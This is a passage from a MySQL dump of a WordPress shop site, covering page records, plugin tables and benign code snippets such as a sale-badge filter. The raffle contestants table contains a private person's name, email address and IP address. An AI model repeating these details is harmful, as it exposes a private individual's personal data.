svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.8.0 - 30-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-autosave-v1','','','2022-11-03 09:42:40','2022-11-03 04:12:40','',1816,'https://gopalak.in/?p=2031',0,'revision','',0),(2032,1,'2022-11-22 12:24:40','2022-11-22 06:54:40','','Order &ndash; November 22, 2022 @ 12:24 PM','','wc-processing','open','closed','wc_order_5s9rPi7ngxJrf','order-nov-22-2022-0654-am','','','2022-11-22 12:25:11','2022-11-22 06:55:11','',0,'https://gopalak.in/?post_type=shop_order&#038;p=2032',0,'shop_order','',3),(2036,1,'2023-03-28 11:05:05','2023-03-28 05:35:05','<p style=\"color:red;font-weight:bold;\">This page and the content has been automatically generated for you to give you a basic idea of how a \"Join Us\" page should look like. You can customize this page however you like it by editing this page from your WordPress page editor.</p><p style=\"font-weight:bold;\">If you end up changing the URL of this page then make sure to update the URL value in the settings menu of the plugin.</p><p style=\"border-top:1px solid #ccc;padding-top:10px;margin-top:10px;\"></p>\n			<strong>Free Membership</strong>\n			<br />\n			You get unlimited access to free membership content\n			<br />\n			<em><strong>Price: Free!</strong></em>\n			<br /><br />Link the following image to go to the Registration Page if you want your visitors to be able to create a free membership account<br /><br />\n			<img title=\"Join Now\" src=\"https://gopalak.in/wp-content/plugins/simple-membership/images/join-now-button-image.gif\" alt=\"Join Now Button\" width=\"277\" height=\"82\" />\n			<p style=\"border-bottom:1px solid #ccc;padding-bottom:10px;margin-bottom:10px;\"></p><p><strong>You can register for a Free Membership or pay for one of the following membership options</strong></p><p style=\"border-top:1px solid #ccc;padding-top:10px;margin-top:10px;\"></p>\n			[ ==> Insert Payment Button For Your Paid Membership Levels Here <== ]\n			<p style=\"border-bottom:1px solid #ccc;padding-bottom:10px;margin-bottom:10px;\"></p>','Join Us','','publish','closed','closed','','membership-join','','','2023-03-28 11:05:05','2023-03-28 05:35:05','',0,'https://gopalak.in/membership-join/',0,'page','',0),(2037,1,'2023-03-28 11:05:05','2023-03-28 05:35:05','[swpm_registration_form]','Registration','','publish','closed','closed','','membership-registration','','','2023-03-28 11:05:05','2023-03-28 05:35:05','',2036,'https://gopalak.in/membership-join/membership-registration/',0,'page','',0),(2038,1,'2023-03-28 11:05:05','2023-03-28 05:35:05','[swpm_login_form]','Member Login','','publish','closed','closed','','membership-login','','','2023-03-28 11:05:05','2023-03-28 05:35:05','',0,'https://gopalak.in/membership-login/',0,'page','',0),(2039,1,'2023-03-28 11:05:05','2023-03-28 05:35:05','[swpm_profile_form]','Profile','','publish','closed','closed','','membership-profile','','','2023-03-28 11:05:05','2023-03-28 05:35:05','',2038,'https://gopalak.in/membership-login/membership-profile/',0,'page','',0),(2040,1,'2023-03-28 11:05:05','2023-03-28 05:35:05','[swpm_reset_form]','Password Reset','','publish','closed','closed','','password-reset','','','2023-03-28 11:05:05','2023-03-28 05:35:05','',2038,'https://gopalak.in/membership-login/password-reset/',0,'page','',0),(2041,1,'2023-03-28 11:05:05','2023-03-28 05:35:05','[swpm_thank_you_page_registration]','Thank You','','publish','closed','closed','','thank-you','','','2023-03-28 11:05:05','2023-03-28 05:35:05','',0,'https://gopalak.in/thank-you/',0,'page','',0),(2042,1,'2023-03-28 12:47:28','2023-03-28 07:17:28','','a','','publish','closed','closed','','a','','','2023-03-28 12:48:28','2023-03-28 07:18:28','',0,'https://gopalak.in/?post_type=restriction&#038;p=2042',0,'restriction','',0),(2043,1,'2023-03-28 12:50:18','2023-03-28 07:20:18','[arm_form id=\"101\" logged_in_message=\"You are already logged in.\"]','Register','','publish','closed','closed','','register','','','2023-03-28 12:50:18','2023-03-28 07:20:18','',0,'https://gopalak.in/register/',0,'page','',0),(2044,1,'2023-03-28 12:50:18','2023-03-28 07:20:18','[arm_form id=\"102\" logged_in_message=\"You are already logged in.\"]','Login','','publish','closed','closed','','login','','','2023-03-28 12:50:18','2023-03-28 07:20:18','',0,'https://gopalak.in/login/',0,'page','',0),(2045,1,'2023-03-28 12:50:18','2023-03-28 07:20:18','[arm_form id=\"103\" logged_in_message=\"You are already logged in.\"]','Forgot Password','','publish','closed','closed','','forgot_password','','','2023-03-28 12:50:18','2023-03-28 07:20:18','',0,'https://gopalak.in/forgot_password/',0,'page','',0),(2046,1,'2023-03-28 12:50:18','2023-03-28 07:20:18','[arm_edit_profile title=\"Edit Your Profile\" form_id=\"101\" form_position=\"center\" social_fields=\"facebook,twitter,linkedin,vk,instagram,pinterest,youtube,dribbble,delicious,tumblr,vine,\"  submit_text=\"Update Profile\" message=\"Your profile has been updated successfully.\"]','Edit Profile','','publish','closed','closed','','edit_profile','','','2023-03-28 12:50:18','2023-03-28 07:20:18','',0,'https://gopalak.in/edit_profile/',0,'page','',0),(2047,1,'2023-03-28 12:50:18','2023-03-28 07:20:18','[arm_form id=\"104\"]','Change Password','','publish','closed','closed','','change_password','','','2023-03-28 12:50:18','2023-03-28 07:20:18','',0,'https://gopalak.in/change_password/',0,'page','',0),(2048,1,'2023-03-28 12:50:18','2023-03-28 07:20:18','<h3>Welcome Guest,</h3>','Guest','','publish','closed','closed','','guest','','','2023-03-28 12:50:18','2023-03-28 07:20:18','',0,'https://gopalak.in/guest/',0,'page','',0),(2049,1,'2023-03-28 12:50:18','2023-03-28 07:20:18','<h3>Thank you for payment with us, We will reach you soon.</h3>','Thank You','','publish','closed','closed','','thank_you','','','2023-03-28 12:50:18','2023-03-28 07:20:18','',0,'https://gopalak.in/thank_you/',0,'page','',0),(2050,1,'2023-03-28 12:50:18','2023-03-28 07:20:18','Your purchase has not been completed.<br/>Sorry something went wrong while processing your payment.','Cancel Payment','','publish','closed','closed','','cancel_payment','','','2023-03-28 12:50:18','2023-03-28 07:20:18','',0,'https://gopalak.in/cancel_payment/',0,'page','',0),(2051,1,'2023-03-28 12:57:44','2023-03-28 07:27:44','<!-- wp:shortcode -->\n[arm_setup id=\"1\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[arm_form id=\"102\"]\n<!-- /wp:shortcode -->','','','publish','closed','closed','','2051-2','','','2023-03-28 12:59:00','2023-03-28 07:29:00','',0,'https://gopalak.in/?page_id=2051',0,'page','',0),(2052,1,'2023-03-28 12:57:44','2023-03-28 07:27:44','<!-- wp:shortcode -->\n[arm_setup id=\"1\"]\n<!-- /wp:shortcode -->','','','inherit','closed','closed','','2051-revision-v1','','','2023-03-28 12:57:44','2023-03-28 07:27:44','',2051,'https://gopalak.in/?p=2052',0,'revision','',0),(2053,1,'2023-03-28 12:58:58','2023-03-28 07:28:58','<!-- wp:shortcode -->\n[arm_setup id=\"1\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[arm_form id=\"102\"]\n<!-- /wp:shortcode -->','','','inherit','closed','closed','','2051-revision-v1','','','2023-03-28 12:58:58','2023-03-28 07:28:58','',2051,'https://gopalak.in/?p=2053',0,'revision','',0),(2055,1,'2023-05-12 17:39:39','2023-05-12 12:09:39','[jb_jobs /]','Jobs','','publish','closed','closed','','jobs','','','2023-05-12 17:39:39','2023-05-12 12:09:39','',0,'https://gopalak.in/jobs/',0,'page','',0),(2056,1,'2023-05-12 17:39:50','2023-05-12 12:09:50','[jb_post_job /]','Post Job','','publish','closed','closed','','job-post','','','2023-05-12 17:39:50','2023-05-12 12:09:50','',0,'https://gopalak.in/job-post/',0,'page','',0),(2057,1,'2023-05-12 17:43:32','2023-05-12 12:13:32','[jb_jobs_dashboard /]','Jobs Dashboard','','publish','closed','closed','','jobs-dashboard','','','2023-05-12 17:43:32','2023-05-12 12:13:32','',0,'https://gopalak.in/jobs-dashboard/',0,'page','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pw_gcmusers`
--

DROP TABLE IF EXISTS `wp_pw_gcmusers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_pw_gcmusers` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `gcm_regid` text DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `status` tinyint(4) DEFAULT 1,
  `device` varchar(128) DEFAULT 'android',
  `topics` varchar(128) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pw_gcmusers`
--

LOCK TABLES `wp_pw_gcmusers` WRITE;
/*!40000 ALTER TABLE `wp_pw_gcmusers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pw_gcmusers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rafflepress_contestants`
--

DROP TABLE IF EXISTS `wp_rafflepress_contestants`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_rafflepress_contestants` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `giveaway_id` int(10) unsigned NOT NULL,
  `fname` varchar(191) DEFAULT NULL,
  `lname` varchar(191) DEFAULT NULL,
  `email` varchar(191) NOT NULL,
  `meta` longtext DEFAULT NULL,
  `ip` varchar(255) DEFAULT NULL,
  `referrer_id` int(10) unsigned DEFAULT NULL,
  `winner` tinyint(4) DEFAULT 0,
  `terms_consent` tinyint(4) DEFAULT 0,
  `winning_entry_id` int(10) unsigned NOT NULL,
  `token` varchar(16) NOT NULL,
  `status` enum('unconfirmed','confirmed','invalid') NOT NULL DEFAULT 'unconfirmed',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `deleted_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rafflepress_contestants`
--

LOCK TABLES `wp_rafflepress_contestants` WRITE;
/*!40000 ALTER TABLE `wp_rafflepress_contestants` DISABLE KEYS */;
INSERT INTO `wp_rafflepress_contestants` VALUES (1,1,'Venkatesha','Vysya','venkateshavn@yahoo.com',NULL,'171.76.108.252',NULL,0,0,0,'rz8haz1f3x3bwk6i','unconfirmed','2022-02-04 11:08:07',NULL);
/*!40000 ALTER TABLE `wp_rafflepress_contestants` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rafflepress_entries`
--

DROP TABLE IF EXISTS `wp_rafflepress_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_rafflepress_entries` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `contestant_id` int(10) unsigned NOT NULL,
  `giveaway_id` int(10) unsigned NOT NULL,
  `action_id` varchar(10) DEFAULT NULL,
  `meta` longtext DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `deleted_at` timestamp NULL DEFAULT NULL,
  `referrer_id` int(10) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rafflepress_entries`
--

LOCK TABLES `wp_rafflepress_entries` WRITE;
/*!40000 ALTER TABLE `wp_rafflepress_entries` DISABLE KEYS */;
INSERT INTO `wp_rafflepress_entries` VALUES (1,1,1,'ozzh','{\"action\":\"Visit us on Facebook\"}','2022-02-04 11:08:26',NULL,NULL);
/*!40000 ALTER TABLE `wp_rafflepress_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rafflepress_giveaways`
--

DROP TABLE IF EXISTS `wp_rafflepress_giveaways`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_rafflepress_giveaways` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) DEFAULT NULL,
  `slug` varchar(250) DEFAULT NULL,
  `parent_url` varchar(250) DEFAULT NULL,
  `uuid` varchar(250) DEFAULT NULL,
  `settings` longtext DEFAULT NULL,
  `meta` longtext DEFAULT NULL,
  `starts` datetime DEFAULT NULL,
  `ends` datetime DEFAULT NULL,
  `active` tinyint(4) NOT NULL DEFAULT 1,
  `show_leaderboard` tinyint(4) NOT NULL DEFAULT 0,
  `giveawaytemplate_id` varchar(250) DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `deleted_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rafflepress_giveaways`
--

LOCK TABLES `wp_rafflepress_giveaways` WRITE;
/*!40000 ALTER TABLE `wp_rafflepress_giveaways` DISABLE KEYS */;
INSERT INTO `wp_rafflepress_giveaways` VALUES (1,'New Giveaway (ID #1)','','https://mangomitra.in/giveaway/','0f6d9a42-2b2c-408b-b6f8-77d988bbe8ff','{\"starts\":\"2022-02-04\",\"starts_time\":\"\",\"prizes\":[{\"name\":\"My Awesome Prize\",\"description\":\"<p>Let\'s go ahead and have fun with the awesome prize that we are providing..<\\/p>\",\"image\":\"\",\"video\":\"\"}],\"webhook_items\":[{\"txt\":\"Webhook \",\"webhooks_url\":\"\",\"webhooks_request_format\":\"json\",\"webhooks_secret\":\"\",\"header\":[{\"parameter_keys\":\"\",\"parameter_value\":\"\"}]}],\"layout\":\"1\",\"entry_options\":[{\"id\":\"ozzh\",\"type\":\"visit-fb\",\"name\":\"Visit homedirect.in on Facebook\",\"value\":\"1\",\"fb_url\":\"https:\\/\\/www.facebook.com\\/homedirect.in\"},{\"id\":\"owqg9o\",\"type\":\"twitter-follow\",\"name\":\"Follow us on Twitter\",\"value\":\"1\"}],\"rules\":\"\",\"ends\":\"2022-02-20\",\"ends_time\":\"\",\"timezone\":\"UTC\",\"font\":\"0\",\"is_new\":false,\"confirmation_email\":\"Please click the link below to confirm your email address.\\n{confirmation-link}\",\"confirmation_subject\":\"[Action Required] Confirm your entry\",\"from_name\":\"wp@dxpsites.com\",\"from_email\":\"wp@dxpsites.com\",\"show_powered_by_link\":false}',NULL,'2022-02-04 00:00:00','2022-02-20 00:00:00',1,0,'basic_giveaway','2022-02-04 09:53:16',NULL);
/*!40000 ALTER TABLE `wp_rafflepress_giveaways` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_rzp_webhook_requests`
--

DROP TABLE IF EXISTS `wp_rzp_webhook_requests`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_rzp_webhook_requests` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `integration` varchar(25) NOT NULL,
  `order_id` int(11) NOT NULL,
  `rzp_order_id` varchar(25) NOT NULL,
  `rzp_webhook_data` text DEFAULT NULL,
  `rzp_webhook_notified_at` int(11) DEFAULT NULL,
  `rzp_update_order_cron_status` int(11) DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_rzp_webhook_requests`
--

LOCK TABLES `wp_rzp_webhook_requests` WRITE;
/*!40000 ALTER TABLE `wp_rzp_webhook_requests` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_rzp_webhook_requests` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_shared_files_log`
--

DROP TABLE IF EXISTS `wp_shared_files_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_shared_files_log` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `message` text NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_shared_files_log`
--

LOCK TABLES `wp_shared_files_log` WRITE;
/*!40000 ALTER TABLE `wp_shared_files_log` DISABLE KEYS */;
INSERT INTO `wp_shared_files_log` VALUES (1,'Plugin updated to version 1.6.74','','2022-03-10 05:53:47');
/*!40000 ALTER TABLE `wp_shared_files_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_signups`
--

DROP TABLE IF EXISTS `wp_signups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_signups` (
  `signup_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `domain` varchar(200) NOT NULL DEFAULT '',
  `path` varchar(100) NOT NULL DEFAULT '',
  `title` longtext NOT NULL,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `active` tinyint(1) NOT NULL DEFAULT 0,
  `activation_key` varchar(50) NOT NULL DEFAULT '',
  `meta` longtext DEFAULT NULL,
  PRIMARY KEY (`signup_id`),
  KEY `activation_key` (`activation_key`),
  KEY `user_email` (`user_email`),
  KEY `user_login_email` (`user_login`,`user_email`),
  KEY `domain_path` (`domain`(140),`path`(51))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_signups`
--

LOCK TABLES `wp_signups` WRITE;
/*!40000 ALTER TABLE `wp_signups` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_signups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_snippets`
--

DROP TABLE IF EXISTS `wp_snippets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_snippets` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` tinytext NOT NULL,
  `description` text NOT NULL,
  `code` longtext NOT NULL,
  `tags` longtext NOT NULL,
  `scope` varchar(15) NOT NULL DEFAULT 'global',
  `priority` smallint(6) NOT NULL DEFAULT 10,
  `active` tinyint(1) NOT NULL DEFAULT 0,
  `modified` datetime NOT NULL DEFAULT current_timestamp(),
  `revision` bigint(20) NOT NULL DEFAULT 1,
  `cloud_id` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `scope` (`scope`),
  KEY `active` (`active`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_snippets`
--

LOCK TABLES `wp_snippets` WRITE;
/*!40000 ALTER TABLE `wp_snippets` DISABLE KEYS */;
INSERT INTO `wp_snippets` VALUES (1,'Example HTML shortcode','This is an example snippet for demonstrating how to add an HTML shortcode.\n\nYou can remove it, or edit it to add your own content.','\nadd_shortcode( \'shortcode_name\', function () {\n\n	$out = \'<p>write your HTML shortcode content here</p>\';\n\n	return $out;\n} );','shortcode','global',10,0,'2022-02-02 04:28:58',1,NULL),(2,'Example CSS snippet','This is an example snippet for demonstrating how to add custom CSS code to your website.\n\nYou can remove it, or edit it to add your own content.','\nadd_action( \'wp_head\', function () { ?>\n<style>\n\n	/* write your CSS code here */\n\n</style>\n<?php } );\n','css','front-end',10,0,'2022-02-02 04:28:58',1,NULL),(3,'Example JavaScript snippet','This is an example snippet for demonstrating how to add custom JavaScript code to your website.\n\nYou can remove it, or edit it to add your own content.','\nadd_action( \'wp_head\', function () { ?>\n<script>\n\n	/* write your JavaScript code here */\n\n</script>\n<?php } );\n','javascript','front-end',10,0,'2022-02-02 04:28:58',1,NULL),(4,'Order snippets by name','Order snippets by name by default in the snippets table.','\nadd_filter( \'code_snippets/list_table/default_orderby\', function () {\n	return \'name\';\n} );\n','code-snippets-plugin','admin',10,0,'2022-02-02 04:28:58',1,NULL),(5,'Order snippets by date','Order snippets by last modification date by default in the snippets table.','\nadd_filter( \'code_snippets/list_table/default_orderby\', function () {\n	return \'modified\';\n} );\n\nadd_filter( \'code_snippets/list_table/default_order\', function () {\n	return \'desc\';\n} );\n','code-snippets-plugin','admin',10,0,'2022-02-02 04:28:58',1,NULL),(6,'sale badge%','','// Display the Woocommerce Discount Percentage on the Sale Badge for variable products and single products\r\nadd_filter( \'woocommerce_sale_flash\', \'display_percentage_on_sale_badge\', 20, 3 );\r\nfunction display_percentage_on_sale_badge( $html, $post, $product ) {\r\n\r\n  if( $product->is_type(\'variable\')){\r\n      $percentages = array();\r\n\r\n      // This will get all the variation prices and loop throughout them\r\n      $prices = $product->get_variation_prices();\r\n\r\n      foreach( $prices[\'price\'] as $key => $price ){\r\n          // Only on sale variations\r\n          if( $prices[\'regular_price\'][$key] !== $price ){\r\n              // Calculate and set in the array the percentage for each variation on sale\r\n              $percentages[] = round( 100 - ( floatval($prices[\'sale_price\'][$key]) / floatval($prices[\'regular_price\'][$key]) * 100 ) );\r\n          }\r\n      }\r\n      // Displays maximum discount value\r\n      $percentage = max($percentages) . \'%\';\r\n\r\n  } elseif( $product->is_type(\'grouped\') ){\r\n      $percentages = array();\r\n\r\n       // This will get all the variation prices and loop throughout them\r\n      $children_ids = $product->get_children();\r\n\r\n      foreach( $children_ids as $child_id ){\r\n          $child_product = wc_get_product($child_id);\r\n\r\n          $regular_price = (float) $child_product->get_regular_price();\r\n          $sale_price    = (float) $child_product->get_sale_price();\r\n\r\n          if ( $sale_price != 0 || ! empty($sale_price) ) {\r\n              // Calculate and set in the array the percentage for each child on sale\r\n              $percentages[] = round(100 - ($sale_price / $regular_price * 100));\r\n          }\r\n      }\r\n     // Displays maximum discount value\r\n      $percentage = max($percentages) . \'%\';\r\n\r\n  } else {\r\n      $regular_price = (float) $product->get_regular_price();\r\n      $sale_price    = (float) $product->get_sale_price();\r\n\r\n      if ( $sale_price != 0 || ! empty($sale_price) ) {\r\n          $percentage    = round(100 - ($sale_price / $regular_price * 100)) . \'%\';\r\n      } else {\r\n          return $html;\r\n      }\r\n  }\r\n  return \'<span class=\"onsale\">\' . esc_html__( \'up to -\', \'woocommerce\' ) . \' \'. $percentage . \'</span>\'; // If needed then change or remove \"up to -\" text\r\n}','','front-end',10,1,'2022-02-02 04:34:40',1,NULL);
/*!40000 ALTER TABLE `wp_snippets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_swpm_events_tbl`
--

DROP TABLE IF EXISTS `wp_swpm_events_tbl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_swpm_events_tbl` (
  `event_id` int(12) NOT NULL AUTO_INCREMENT,
